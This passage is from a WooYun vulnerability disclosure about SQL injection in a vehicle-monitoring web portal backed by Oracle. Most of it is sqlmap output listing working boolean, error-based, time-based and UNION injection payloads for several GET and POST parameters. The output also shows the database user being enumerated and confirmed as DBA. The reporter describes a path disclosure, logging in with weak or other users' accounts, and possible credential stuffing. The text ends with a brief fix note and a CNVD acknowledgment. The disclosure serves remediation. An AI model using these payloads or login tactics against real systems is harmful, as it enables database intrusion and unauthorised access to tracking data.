(60)||CHR(58)||CHR(113)||CHR(113)||CHR(110)||CHR(118)||CHR(113)||(SELECT (CASE W
HEN (2080=2080) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(121)||CHR
(119)||CHR(113)||CHR(62))) FROM DUAL) AND 'JpCS'='JpCS&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: day1=2015-09-18&day2=2015-09-19' AND 9230=DBMS_PIPE.RECEIVE_MESSAGE
(CHR(119)||CHR(88)||CHR(104)||CHR(103),5) AND 'qvBw'='qvBw&sub1=%E6%90%9C%E7%B4%
A2
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: day1, type: Single quoted string (default)
[1] place: POST, parameter: day2, type: Single quoted string
[q] Quit
> 0
[23:58:02] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:58:02] [INFO] fetching current user
[23:58:02] [INFO] retrieved: SHMOTO
current user:    'SHMOTO'
[23:58:02] [INFO] fetching current database
[23:58:02] [INFO] resumed: SHMOTO
[23:58:02] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SHMOTO'
[23:58:02] [INFO] testing if current user is DBA
current user is DBA:    True


车辆报警数据:

**.**.**.**/tongji_alarm.php?cc%5B%5D=9&cc%5B%5D=0&cc%5B%5D=8&day1=2015-09-12&day2=2015-09-
19&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2


cc[]、day1、day2、company_id、chepaihao存在注入

GET parameter 'chepaihao' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 193 HTTP(s) req
uests:
---
Place: GET
Parameter: chepaihao
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0&chepaihao=2%' AND 7902=7902 AND '%'='&sub1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0&chepaihao=2%' AND 3244=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(1
06)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (3244=3244) THEN 1 ELSE 0
END) FROM DUAL)||CHR(113)||CHR(111)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FRO
M DUAL) AND '%'='&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0&chepaihao=2%' AND 9308=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(101)||CHR(107)||
CHR(88),5) AND '%'='&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: company_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0' AND 8210=8210 AND 'lrXx'='lrXx&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0' AND 8254=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)
||CHR(112)||CHR(113)||(SELECT (CASE WHEN (8254=8254) THEN 1 ELSE 0 END) FROM DUA
L)||CHR(113)||CHR(111)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND '
cKUq'='cKUq&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0' AND 7966=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(122)||CHR(87)||CHR(102),5) A
ND 'XlJT'='XlJT&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: cc[]
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cc[]=9&cc[]=0&cc[]=8) AND 8423=8423 AND (4464=4464&day1=2015-09-12&
day2=2015-09-19&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: cc[]=9&cc[]=0&cc[]=8) AND 7189=(SELECT UPPER(XMLType(CHR(60)||CHR(5
8)||CHR(113)||CHR(106)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (7189=7
189) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(101)||CHR(114)||CHR(
113)||CHR(62))) FROM DUAL) AND (9939=9939&day1=2015-09-12&day2=2015-09-19&compan
y_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: cc[]=9&cc[]=0&cc[]=8) AND 2096=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||
CHR(119)||CHR(66)||CHR(108),5) AND (4549=4549&day1=2015-09-12&day2=2015-09-19&co
mpany_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: day1
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12' AND 5745=5745 AND 'frCg'='frC
g&day2=2015-09-19&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12' AND 3173=(SELECT UPPER(XMLTyp
e(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(112)||CHR(113)||(SELECT (C
ASE WHEN (3173=3173) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(101)
||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'RzyE'='RzyE&day2=2015-09-19&comp
any_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12' AND 6165=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(85)||CHR(73)||CHR(110)||CHR(65),5) AND 'yOqY'='yOqY&day2=2015-09-19&co
mpany_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: day2
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19' AND 4404=4404
 AND 'Cvwl'='Cvwl&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19' AND 9930=(SEL
ECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(112)||CHR(
113)||(SELECT (CASE WHEN (9930=9930) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CH
R(111)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'Oqdi'='Oqdi&comp
any_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19' AND 2842=DBMS
_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(115)||CHR(121)||CHR(115),5) AND 'jANQ'='jANQ&
company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: cc[], type: Unescaped numeric (default)
[1] place: GET, parameter: day1, type: Single quoted string
[2] place: GET, parameter: day2, type: Single quoted string
[3] place: GET, parameter: company_id, type: Single quoted string
[4] place: GET, parameter: chepaihao, type: Single quoted string
[q] Quit
> 0
[00:02:38] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[00:02:38] [INFO] fetching current user
[00:02:38] [INFO] retrieved: SHMOTO
current user:    'SHMOTO'
[00:02:38] [INFO] fetching current database
[00:02:38] [INFO] resumed: SHMOTO
[00:02:38] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SHMOTO'
[00:02:38] [INFO] testing if current user is DBA
current user is DBA:    True


分组报警数据:(没有获取到数据)
车辆行驶明细:

**.**.**.**/tongji_xingshi.php?day=2015-09-19&car_number=2222&sub1=%E6%90%9C%E7%B4%A2


car_number存在注入

GET parameter 'car_number' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N] n
sqlmap identified the following injection points with a total of 144 HTTP(s) req
uests:
---
Place: GET
Parameter: car_number
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: day=2015-09-19&car_number=2222%' AND 4843=(SELECT UPPER(XMLType(CHR
(60)||CHR(58)||CHR(113)||CHR(111)||CHR(118)||CHR(121)||CHR(113)||(SELECT (CASE W
HEN (4843=4843) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(99)||CHR(
108)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='&sub1=%E6%90%9C%E7%B4%A2
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: day=2015-09-19&car_number=2222%' UNION ALL SELECT NULL,NULL,NULL,NU
LL,NULL,CHR(113)||CHR(111)||CHR(118)||CHR(121)||CHR(113)||CHR(109)||CHR(121)||CH
R(90)||CHR(90)||CHR(113)||CHR(65)||CHR(84)||CHR(66)||CHR(122)||CHR(85)||CHR(113)
||CHR(112)||CHR(99)||CHR(108)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &sub1=%E
6%90%9C%E7%B4%A2
---
[00:05:38] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[00:05:38] [INFO] fetching current user
current user:    'SHMOTO'
[00:05:38] [INFO] fetching current database
[00:05:38] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SHMOTO'
[00:05:38] [INFO] testing if current user is DBA
current user is DBA:    True


未使用车辆查询:

**.**.**.**/tongji_nowork.php?day1=2015-09-14&day2=2015-09-19&company_level=1970&sub1=%E6%90%9C
%E7%B4%A2


day1、day2、company_id存在注入
就不继续测试了!~~~
7、注入同时也暴露路径!~~~

**.**.**.**/device_dt.php?imei=356801031781579&company_id=1970'


如下图!~~~

注入+路径.jpg


退出来后,就登录不上去了?这么快就修复好了?我还没有提交,不过后台的注入点可能是有的。
不过似乎应该存在撞库的可能哦,没有验证,没有修复!~~~
虽然test测试太多被封了,但是还是可以通过其他用户进入,而且比test更多监控哦!~~~
看图!~~~

登录2.jpg

漏洞证明:

如上

修复方案:

过滤修复
修改弱密码!~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-24 15:57

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向北京市政府信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无